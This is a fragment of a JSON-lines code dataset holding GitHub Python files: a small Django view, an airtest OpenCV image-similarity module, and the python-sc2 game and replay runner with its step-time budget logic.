"line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "utils.SOURCE_NODE", "line_number": 328, "usage_type": "name"}, {"api_name": "evaluation.cost_model.update_subplan_costs", "line_number": 341, "usage_type": "call"}, {"api_name": "networkx.shortest_path", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap.from_list", "line_number": 384, "usage_type": "call"}, {"api_name": 
"matplotlib.colors", "line_number": 384, "usage_type": "attribute"}, {"api_name": "networkx.nx_pydot.pydot_layout", "line_number": 393, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 393, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "networkx.get_node_attributes", "line_number": 398, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 400, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 406, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 417, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 426, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 435, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 435, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 435, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 436, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 436, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 436, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 437, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}]} +{"seq_id": "36805208294", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom challenges.models import CommunityChallenge\n\ndef challenges(request):\n num_challenge_posts = CommunityChallenge.objects.all().count()\n posts = CommunityChallenge.objects.order_by('-published_date')\n\n context = {\n 'num_challenge_posts': num_challenge_posts,\n 'challenges': posts,\n }\n\n\n return render(request, 'challenges.html', context=context)", "repo_name": "katiehrenchir/you-go-girl", "sub_path": "challenges/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "challenges.models.CommunityChallenge.objects.all", "line_number": 6, "usage_type": "call"}, {"api_name": "challenges.models.CommunityChallenge.objects", "line_number": 6, "usage_type": "attribute"}, {"api_name": "challenges.models.CommunityChallenge", "line_number": 6, "usage_type": "name"}, {"api_name": "challenges.models.CommunityChallenge.objects.order_by", "line_number": 7, "usage_type": "call"}, {"api_name": "challenges.models.CommunityChallenge.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "challenges.models.CommunityChallenge", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "34093717952", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"These functions calculate the similarity of two images of the same size.\"\"\"\n\n\nimport cv2\nfrom .utils import img_mat_rgb_2_gray\n\n\ndef 
cal_ccoeff_confidence(im_source, im_search):\n \"\"\"Compute the confidence between two images using the TM_CCOEFF_NORMED method.\"\"\"\n # expand the region used for the confidence calculation\n im_search = cv2.copyMakeBorder(im_search, 10,10,10,10,cv2.BORDER_REPLICATE)\n \n im_source, im_search = img_mat_rgb_2_gray(im_source), img_mat_rgb_2_gray(im_search)\n res = cv2.matchTemplate(im_source, im_search, cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n return max_val\n\n\ndef cal_rgb_confidence(img_src_rgb, img_sch_rgb):\n \"\"\"Compute the similarity of two color images of the same size.\"\"\"\n # expand the region used for the confidence calculation\n img_sch_rgb = cv2.copyMakeBorder(img_sch_rgb, 10,10,10,10,cv2.BORDER_REPLICATE)\n # convert to HSV to strengthen the influence of color\n img_src_rgb = cv2.cvtColor(img_src_rgb, cv2.COLOR_BGR2HSV)\n img_sch_rgb = cv2.cvtColor(img_sch_rgb, cv2.COLOR_BGR2HSV)\n src_bgr, sch_bgr = cv2.split(img_src_rgb), cv2.split(img_sch_rgb)\n\n # compute the confidence of the three BGR channels and store them in bgr_confidence:\n bgr_confidence = [0, 0, 0]\n # pin the value range so the algorithm does not over-amplify tiny differences\n src_bgr[0][0,0] = sch_bgr[0][0,0] = 0\n src_bgr[0][0,1] = sch_bgr[0][0,1] = 255\n for i in range(3):\n res_temp = cv2.matchTemplate(src_bgr[i], sch_bgr[i], cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res_temp)\n bgr_confidence[i] = max_val\n\n return min(bgr_confidence)\n", "repo_name": "manito-666/air_uitest", "sub_path": "lib/python3.9/site-packages/airtest/aircv/cal_confidence.py", "file_name": "cal_confidence.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.copyMakeBorder", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.img_mat_rgb_2_gray", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.matchTemplate", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.matchTemplate", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "36448126999", "text": "import asyncio\nimport logging\nimport time\nimport six\nimport json\nimport os\nimport mpyq\nimport async_timeout\nfrom s2clientprotocol import sc2api_pb2 as sc_pb\n\nfrom .client import Client\nfrom .data import CreateGameError, Result\nfrom .game_state import GameState\nfrom .player import Bot, Human\nfrom .portconfig import Portconfig\nfrom .protocol import ConnectionAlreadyClosed, ProtocolError\nfrom .sc2process import SC2Process\n\nlogger = logging.getLogger(__name__)\n\n\nclass SlidingTimeWindow:\n def __init__(self, size: int):\n assert size > 0\n\n self.window_size = size\n self.window = []\n\n def push(self, value: float):\n self.window = (self.window + [value])[-self.window_size :]\n\n def clear(self):\n self.window = []\n\n 
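# usage sketch (added annotation, not part of the original file):\n # w = SlidingTimeWindow(3)\n # for t in (0.1, 0.2, 0.3, 0.4): w.push(t)\n # w.window == [0.2, 0.3, 0.4]; w.sum ~= 0.9; w.available ~= 0.7\n\n 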
@property\n def sum(self) -> float:\n return sum(self.window)\n\n @property\n def available(self) -> float:\n return sum(self.window[1:])\n\n @property\n def available_fmt(self) -> str:\n return \",\".join(f\"{w:.2f}\" for w in self.window[1:])\n\n\nasync def _play_game_human(client, player_id, realtime, game_time_limit):\n while True:\n state = await client.observation()\n if client._game_result:\n return client._game_result[player_id]\n\n if game_time_limit and (state.observation.observation.game_loop * 0.725 * (1 / 16)) > game_time_limit:\n print(state.observation.game_loop, state.observation.game_loop * 0.14)\n return Result.Tie\n\n if not realtime:\n await client.step()\n\n\nasync def _play_game_ai(client, player_id, ai, realtime, step_time_limit, game_time_limit):\n if realtime:\n assert step_time_limit is None\n\n # step_time_limit works like this:\n # * If None, then step time is not limited\n # * If given an integer or float, the bot will simply resign if any step takes longer than that\n # * Otherwise step_time_limit must be an object, with the following settings:\n #\n # Key | Value | Description\n # ------------|------------|-------------\n # penalty | None | No penalty, the bot can continue on next step\n # penalty | N: int | Cooldown penalty, BotAI.on_step will not be called for N steps\n # penalty | \"resign\" | Bot resigns when going over time limit\n # time_limit | int/float | Time limit for a single step\n # window_size | N: int | The time limit will be used for the last N steps, instead of 1\n #\n # Cooldown is a harsh penalty. The bot loses the ability to act, but even worse,\n # the observation data from skipped steps is also lost. It's like falling asleep in\n # the middle of the game.\n time_penalty_cooldown = 0\n if step_time_limit is None:\n time_limit = None\n time_window = None\n time_penalty = None\n elif isinstance(step_time_limit, (int, float)):\n time_limit = float(step_time_limit)\n time_window = SlidingTimeWindow(1)\n time_penalty = \"resign\"\n else:\n assert isinstance(step_time_limit, dict)\n time_penalty = step_time_limit.get(\"penalty\", None)\n time_window = SlidingTimeWindow(int(step_time_limit.get(\"window_size\", 1)))\n # fixed: float(None) raised a TypeError when no time_limit key was given\n raw_time_limit = step_time_limit.get(\"time_limit\", None)\n time_limit = float(raw_time_limit) if raw_time_limit is not None else None\n\n ai._initialize_variables()\n\n game_data = await client.get_game_data()\n game_info = await client.get_game_info()\n\n # This game_data will become self._game_data in botAI\n ai._prepare_start(client, player_id, game_info, game_data, realtime=realtime)\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n await ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n gs = GameState(state.observation)\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n await ai.on_before_start()\n ai._prepare_first_step()\n try:\n await ai.on_start()\n except Exception as e:\n logger.exception(f\"AI on_start threw an error\")\n logger.error(f\"resigning due to previous error\")\n await ai.on_end(Result.Defeat)\n return Result.Defeat\n\n iteration = 0\n while True:\n if iteration != 0:\n if realtime:\n # On realtime=True, might get an error here: sc2.protocol.ProtocolError: ['Not in a game']\n try:\n requested_step = gs.game_loop + client.game_step\n state = await client.observation(requested_step)\n # If the bot took too long in the previous observation, request another observation one frame after\n if 
state.observation.observation.game_loop > requested_step:\n # TODO Remove these 2 comments\n # t = state.observation.observation.game_loop\n state = await client.observation(state.observation.observation.game_loop + 1)\n # print(f\"Requested step: {requested_step}, received: {t}, new: {state.observation.observation.game_loop}\")\n except ProtocolError:\n pass\n else:\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n try:\n await ai.on_end(client._game_result[player_id])\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {client._game_result[player_id]}\")\n return client._game_result[player_id]\n return client._game_result[player_id]\n gs = GameState(state.observation)\n logger.debug(f\"Score: {gs.score.score}\")\n\n if game_time_limit and (gs.game_loop * 0.725 * (1 / 16)) > game_time_limit:\n await ai.on_end(Result.Tie)\n return Result.Tie\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n\n logger.debug(f\"Running AI step, it={iteration} {gs.game_loop * 0.725 * (1 / 16):.2f}s\")\n\n try:\n if realtime:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n if time_penalty_cooldown > 0:\n time_penalty_cooldown -= 1\n logger.warning(f\"Running AI step: penalty cooldown: {time_penalty_cooldown}\")\n iteration -= 1 # Do not increment the iteration on this round\n elif time_limit is None:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n out_of_budget = False\n budget = time_limit - time_window.available\n\n # Tell the bot how much time it has left attribute\n ai.time_budget_available = budget\n\n if budget < 0:\n logger.warning(f\"Running AI step: out of budget before step\")\n step_time = 0.0\n out_of_budget = True\n else:\n step_start = time.monotonic()\n try:\n async with async_timeout.timeout(budget):\n await ai.issue_events()\n await ai.on_step(iteration)\n except asyncio.TimeoutError:\n step_time = time.monotonic() - step_start\n logger.warning(\n f\"Running AI step: out of budget; \"\n + f\"budget={budget:.2f}, steptime={step_time:.2f}, \"\n + f\"window={time_window.available_fmt}\"\n )\n out_of_budget = True\n step_time = time.monotonic() - step_start\n\n time_window.push(step_time)\n\n if out_of_budget and time_penalty is not None:\n if time_penalty == \"resign\":\n raise RuntimeError(\"Out of time\")\n else:\n time_penalty_cooldown = int(time_penalty)\n time_window.clear()\n\n await ai._after_step()\n except Exception as e:\n if isinstance(e, ProtocolError) and e.is_game_over_error:\n if realtime:\n return None\n result = client._game_result[player_id]\n if result is None:\n logger.error(\"Game over, but no results gathered\")\n raise\n await ai.on_end(result)\n return result\n # NOTE: this message is caught by pytest suite\n logger.exception(f\"AI step threw an error\") # DO NOT EDIT!\n logger.error(f\"Error: {e}\")\n logger.error(f\"Resigning due to previous error\")\n try:\n await ai.on_end(Result.Defeat)\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {Result.Defeat}\")\n return Result.Defeat\n return Result.Defeat\n\n logger.debug(f\"Running AI step: done\")\n\n if not realtime:\n if not client.in_game: # Client left (resigned) the game\n await 
ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n\n await client.step()\n\n iteration += 1\n\n\nasync def _play_game(\n player, client, realtime, portconfig, step_time_limit=None, game_time_limit=None, rgb_render_config=None\n):\n assert isinstance(realtime, bool), repr(realtime)\n\n player_id = await client.join_game(\n player.name, player.race, portconfig=portconfig, rgb_render_config=rgb_render_config\n )\n logging.info(f\"Player {player_id} - {player.name if player.name else str(player)}\")\n\n if isinstance(player, Human):\n result = await _play_game_human(client, player_id, realtime, game_time_limit)\n else:\n result = await _play_game_ai(client, player_id, player.ai, realtime, step_time_limit, game_time_limit)\n\n logging.info(f\"Result for player {player_id} - {player.name if player.name else str(player)}: {result._name_}\")\n\n return result\n\n\nasync def _play_replay(client, ai, realtime=False, player_id=0):\n ai._initialize_variables()\n\n game_data = await client.get_game_data()\n game_info = await client.get_game_info()\n client.game_step = 1\n # This game_data will become self._game_data in botAI\n ai._prepare_start(client, player_id, game_info, game_data, realtime=realtime)\n state = await client.observation()\n # Check game result every time we get the observation\n if client._game_result:\n await ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n gs = GameState(state.observation)\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n ai._prepare_first_step()\n try:\n await ai.on_start()\n except Exception as e:\n logger.exception(f\"AI on_start threw an error\")\n logger.error(f\"resigning due to previous error\")\n await ai.on_end(Result.Defeat)\n return Result.Defeat\n\n iteration = 0\n while True:\n if iteration != 0:\n if realtime:\n # TODO: check what happens if a bot takes too long to respond, so that the requested\n # game_loop might already be in the past\n state = await client.observation(gs.game_loop + client.game_step)\n else:\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n try:\n await ai.on_end(client._game_result[player_id])\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {client._game_result[player_id]}\")\n return client._game_result[player_id]\n return client._game_result[player_id]\n gs = GameState(state.observation)\n logger.debug(f\"Score: {gs.score.score}\")\n\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n\n logger.debug(f\"Running AI step, it={iteration} {gs.game_loop * 0.725 * (1 / 16):.2f}s\")\n\n try:\n if realtime:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n\n except Exception as e:\n if isinstance(e, ProtocolError) and e.is_game_over_error:\n if realtime:\n return None\n # result = client._game_result[player_id]\n # if result is None:\n # logger.error(\"Game over, but no results gathered\")\n # raise\n await ai.on_end(Result.Victory)\n return None\n # NOTE: this message is caught by pytest suite\n logger.exception(f\"AI step threw an error\") # DO NOT EDIT!\n logger.error(f\"Error: {e}\")\n 
logger.error(f\"Resigning due to previous error\")\n try:\n await ai.on_end(Result.Defeat)\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {Result.Defeat}\")\n return Result.Defeat\n return Result.Defeat\n\n logger.debug(f\"Running AI step: done\")\n\n if not realtime:\n if not client.in_game: # Client left (resigned) the game\n await ai.on_end(Result.Victory)\n return Result.Victory\n\n await client.step() # unindent one line to work in realtime\n\n iteration += 1\n\n\nasync def _setup_host_game(server, map_settings, players, realtime, random_seed=None, disable_fog=None):\n r = await server.create_game(map_settings, players, realtime, random_seed, disable_fog)\n if r.create_game.HasField(\"error\"):\n err = f\"Could not create game: {CreateGameError(r.create_game.error)}\"\n if r.create_game.HasField(\"error_details\"):\n err += f\": {r.create_game.error_details}\"\n logger.critical(err)\n raise RuntimeError(err)\n\n return Client(server._ws)\n\n\nasync def _host_game(\n map_settings,\n players,\n realtime,\n portconfig=None,\n save_replay_as=None,\n step_time_limit=None,\n game_time_limit=None,\n rgb_render_config=None,\n random_seed=None,\n sc2_version=None,\n disable_fog=None,\n):\n\n assert players, \"Can't create a game without players\"\n\n assert any(isinstance(p, (Human, Bot)) for p in players)\n\n async with SC2Process(\n fullscreen=players[0].fullscreen, render=rgb_render_config is not None, sc2_version=sc2_version\n ) as server:\n await server.ping()\n\n client = await _setup_host_game(server, map_settings, players, realtime, random_seed, disable_fog)\n # Bot can decide if it wants to launch with 'raw_affects_selection=True'\n if not isinstance(players[0], Human) and getattr(players[0].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[0].ai.raw_affects_selection\n\n try:\n result = await _play_game(\n players[0], client, realtime, portconfig, step_time_limit, game_time_limit, rgb_render_config\n )\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n await client.quit()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return None\n\n return result\n\n\nasync def _host_game_aiter(\n map_settings, players, realtime, portconfig=None, save_replay_as=None, step_time_limit=None, game_time_limit=None,\n):\n assert players, \"Can't create a game without players\"\n\n assert any(isinstance(p, (Human, Bot)) for p in players)\n\n async with SC2Process() as server:\n while True:\n await server.ping()\n\n client = await _setup_host_game(server, map_settings, players, realtime)\n if not isinstance(players[0], Human) and getattr(players[0].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[0].ai.raw_affects_selection\n\n try:\n result = await _play_game(players[0], client, realtime, portconfig, step_time_limit, game_time_limit)\n\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return\n\n new_players = yield result\n if new_players is not None:\n players = new_players\n\n\ndef _host_game_iter(*args, **kwargs):\n game = _host_game_aiter(*args, **kwargs)\n new_playerconfig = None\n while True:\n new_playerconfig = yield asyncio.get_event_loop().run_until_complete(game.asend(new_playerconfig))\n\n\nasync def _join_game(\n 
players, realtime, portconfig, save_replay_as=None, step_time_limit=None, game_time_limit=None,\n):\n async with SC2Process(fullscreen=players[1].fullscreen) as server:\n await server.ping()\n\n client = Client(server._ws)\n # Bot can decide if it wants to launch with 'raw_affects_selection=True'\n if not isinstance(players[1], Human) and getattr(players[1].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[1].ai.raw_affects_selection\n\n try:\n result = await _play_game(players[1], client, realtime, portconfig, step_time_limit, game_time_limit)\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n await client.quit()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return None\n\n return result\n\n\nasync def _setup_replay(server, replay_path, realtime, observed_id):\n await server.start_replay(replay_path, realtime, observed_id)\n return Client(server._ws)\n\n\nasync def _host_replay(replay_path, ai, realtime, portconfig, base_build, data_version, observed_id):\n async with SC2Process(fullscreen=False, base_build=base_build, data_hash=data_version) as server:\n response = await server.ping()\n\n client = await _setup_replay(server, replay_path, realtime, observed_id)\n result = await _play_replay(client, ai, realtime)\n return result\n\n\ndef get_replay_version(replay_path):\n with open(replay_path, \"rb\") as f:\n replay_data = f.read()\n replay_io = six.BytesIO()\n replay_io.write(replay_data)\n replay_io.seek(0)\n archive = mpyq.MPQArchive(replay_io).extract()\n metadata = json.loads(archive[b\"replay.gamemetadata.json\"].decode(\"utf-8\"))\n return metadata[\"BaseBuild\"], metadata[\"DataVersion\"]\n\n\ndef run_game(map_settings, players, **kwargs):\n if sum(isinstance(p, (Human, Bot)) for p in players) > 1:\n host_only_args = [\"save_replay_as\", \"rgb_render_config\", \"random_seed\", \"sc2_version\", \"disable_fog\"]\n join_kwargs = {k: v for k, v in kwargs.items() if k not in host_only_args}\n\n portconfig = Portconfig()\n result = asyncio.get_event_loop().run_until_complete(\n asyncio.gather(\n _host_game(map_settings, players, **kwargs, portconfig=portconfig),\n _join_game(players, **join_kwargs, portconfig=portconfig),\n )\n )\n else:\n result = asyncio.get_event_loop().run_until_complete(_host_game(map_settings, players, **kwargs))\n return result\n\n\ndef run_replay(ai, replay_path, realtime=False, observed_id=0):\n portconfig = Portconfig()\n assert os.path.isfile(replay_path), f\"Replay does not exist at the given path: {replay_path}\"\n assert os.path.isabs(\n replay_path\n ), f'Replay path has to be an absolute path, e.g. 
\"C:/replays/my_replay.SC2Replay\" but given path was \"{replay_path}\"'\n base_build, data_version = get_replay_version(replay_path)\n result = asyncio.get_event_loop().run_until_complete(\n _host_replay(replay_path, ai, realtime, portconfig, base_build, data_version, observed_id)\n )\n return result\n", "repo_name": "mitchkoko/firstbot", "sub_path": "python-sc2/sc2/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 21385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 50, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 51, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 52, "usage_type": "attribute"}, {"api_name": "data.Result.Tie", "line_number": 56, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 56, "usage_type": "name"}, {"api_name": "client.step", "line_number": 59, "usage_type": "call"}, {"api_name": "client.get_game_data", "line_number": 99, "usage_type": "call"}, {"api_name": "client.get_game_info", "line_number": 100, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 104, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 106, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 107, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 108, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 109, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 110, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 110, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 110, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 119, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 119, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 120, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 120, "usage_type": "name"}, {"api_name": "client.game_step", "line_number": 128, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 129, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 134, "usage_type": "call"}, {"api_name": "protocol.ProtocolError", "line_number": 136, "usage_type": "name"}, {"api_name": "client.observation", "line_number": 139, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 141, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 143, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 147, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 148, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 149, "usage_type": "call"}, {"api_name": "data.Result.Tie", "line_number": 153, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 153, "usage_type": "name"}, {"api_name": "data.Result.Tie", "line_number": 154, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 154, "usage_type": "name"}, {"api_name": "client._execute", "line_number": 155, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 155, "usage_type": "call"}, {"api_name": 
"s2clientprotocol.sc2api_pb2", "line_number": 155, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 188, "usage_type": "call"}, {"api_name": "async_timeout.timeout", "line_number": 190, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 193, "usage_type": "attribute"}, {"api_name": "time.monotonic", "line_number": 194, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 201, "usage_type": "call"}, {"api_name": "protocol.ProtocolError", "line_number": 214, "usage_type": "argument"}, {"api_name": "client._game_result", "line_number": 217, "usage_type": "attribute"}, {"api_name": "data.Result.Defeat", "line_number": 228, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 228, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 232, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 232, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 233, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 233, "usage_type": "name"}, {"api_name": "client.in_game", "line_number": 238, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 239, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 240, "usage_type": "attribute"}, {"api_name": "client.step", "line_number": 242, "usage_type": "call"}, {"api_name": "client.join_game", "line_number": 252, "usage_type": "call"}, {"api_name": "player.name", "line_number": 253, "usage_type": "attribute"}, {"api_name": "player.race", "line_number": 253, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 255, "usage_type": "call"}, {"api_name": "player.name", "line_number": 255, "usage_type": "attribute"}, {"api_name": "player.Human", "line_number": 257, "usage_type": "argument"}, {"api_name": "player.ai", "line_number": 260, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 262, "usage_type": "call"}, {"api_name": "player.name", "line_number": 262, "usage_type": "attribute"}, {"api_name": "client.get_game_data", "line_number": 270, "usage_type": "call"}, {"api_name": "client.get_game_info", "line_number": 271, "usage_type": "call"}, {"api_name": "client.game_step", "line_number": 272, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 275, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 277, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 278, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 279, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 280, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 281, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 281, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 281, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 289, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 289, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 290, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 290, "usage_type": "name"}, {"api_name": "client.observation", "line_number": 298, "usage_type": "call"}, {"api_name": "client.game_step", "line_number": 298, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 300, "usage_type": "call"}, 
